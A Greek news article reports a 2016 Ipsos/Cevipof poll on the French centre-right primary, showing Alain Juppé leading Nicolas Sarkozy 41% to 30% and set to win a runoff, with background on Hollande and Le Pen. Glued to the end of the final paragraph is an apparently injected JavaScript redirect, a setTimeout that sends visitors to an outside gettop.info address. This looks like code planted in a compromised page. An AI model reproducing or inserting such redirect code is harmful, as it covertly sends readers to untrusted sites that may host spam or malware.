Γαλλία: Αυξάνεται η διαφορά μεταξύ Ζιπέ-Σαρκοζί -Τους χωρίζουν 11 μονάδες

0
8

 

Ο πρώην πρωθυπουργός Αλέν Ζιπέ αύξησε το προβάδισμά του έναντι του πρώην προέδρου της χώρας Νικολά Σαρκοζί για το χρίσμα της Κεντροδεξιάς ενόψει των προεδρικών εκλογών του 2017, έδειξε δημοσκόπηση.

Ο κ. Σαρκοζί, ο οποίος διετέλεσε πρόεδρος της Γαλλίας από το 2007 έως το 2012, είχε αρχικά μικρύνει τη διαφορά του από τον κ. Ζιπέ όταν ανακοίνωσε την έναρξη της προεκλογικής εκστρατείας του τον Αύγουστο, με πρόγραμμα επιβολής νόμου και τάξης.

Όμως η σκληροπυρηνική στρατηγική του φαίνεται ότι αποβαίνει σε βάρος του καθώς πλησιάζει η προκριματική ψηφοφορία.
Σύμφωνα με την εν λόγω δημοσκόπηση, ο κ. Ζιπέ θα κερδίσει το 41% των ψήφων στον πρώτο γύρο στις 20 Νοεμβρίου, καταγράφοντας άνοδο τεσσάρων μονάδων από τον περασμένο μήνα, ενώ ο κ. Σαρκοζί χάνει τρεις μονάδες και πέφτει στο 30%.

Η δημοσκόπηση πραγματοποιήθηκε από τον οργανισμό Ipsos και το ερευνητικό ινστιτούτο Cevipof.
Κανένας από τους πέντε άλλους, λιγότερο γνωστούς υποψηφίους δεν συγκεντρώνει πολλές ψήφους, πράγμα που σημαίνει ότι οι κ.κ. Σαρκοζί και Ζιπέ είναι σχεδόν σίγουρο ότι θα μονομαχήσουν στον β’ γύρο των προκριματικών στις 27 Νοεμβρίου.
Σύμφωνα με τη δημοσκόπηση, ο κ. Ζιπέ, ο οποίος ήταν πρωθυπουργός της Γαλλίας από το 1995 έως το 1997, επί προεδρίας Ζακ Σιράκ και αργότερα διετέλεσε υπουργός Εξωτερικών και υπουργός Άμυνας, θα κέρδιζε εύκολα αυτόν τον δεύτερο γύρο με 60% των ψήφων (+4% σε σχέση με την προηγούμενη δημοσκόπηση).

Ο νικητής των προκριματικών της Κεντροδεξιάς έχει πολλές πιθανότητες να επικρατήσει στις προεδρικές εκλογές που θα διεξαχθούν τον Μάιο, με δεδομένα την πολύ χαμηλή δημοτικότητα του σοσιαλιστή προέδρου της Γαλλίας Φρανσουά Ολάντ και τις διενέξεις μεταξύ των υποψηφίων της Κεντροαριστεράς.

Ο αντίπαλος του κεντροδεξιού υποψηφίου στον β’ γύρο του νικητή των προκριματικών πιθανολογείται ότι δεν θα είναι σοσιαλιστής, αλλά η ηγέτιδα του ακροδεξιού Εθνικού Μετώπου Μαρίν Λεπέν που, παρά την αυξανόμενη δημοτικότητά της, πιστεύεται ότι δεν θα καταφέρει να συγκεντρώσει την πλειοψηφία σε εθνικό επίπεδο.

Όποιος είναι πρόθυμος να πληρώσει 2 ευρώ και να υπογράψει μια δήλωση ότι συμμερίζεται τις αξίες της Κεντροδεξιάς μπορεί να λάβει μέρος στις προκριματικές εκλογές, που δεν περιορίζονται μόνο στα μέλη του κεντροδεξιού κόμματος «Οι Ρεπουμπλικανοί» των κ.κ. Σαρκοζί και Ζιπέ.

Η δημοσκόπηση δείχνει ότι ο κ. Ζιπέ θα έχει την ισχυρή στήριξη κεντρώων, ακόμη και κεντροαριστερών ψηφοφόρων που θα συμμετάσχουν στις προκριματικές, καθώς τον υποστηρίζει πάνω από το 90% των ψηφοφόρων.
Ο κ. Σαρκοζί έχει μικρό προβάδισμα επί του κ. Ζιπέ, μεταξύ των ψηφοφόρων των Ρεπουμπλικανών με 51% έναντι 49% του κ. Ζιπέ.
Η ίδια δημοσκόπηση έδειξε ότι μόνο 4% των ψηφοφόρων είναι ικανοποιημένοι από τον κ. Ολάντ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here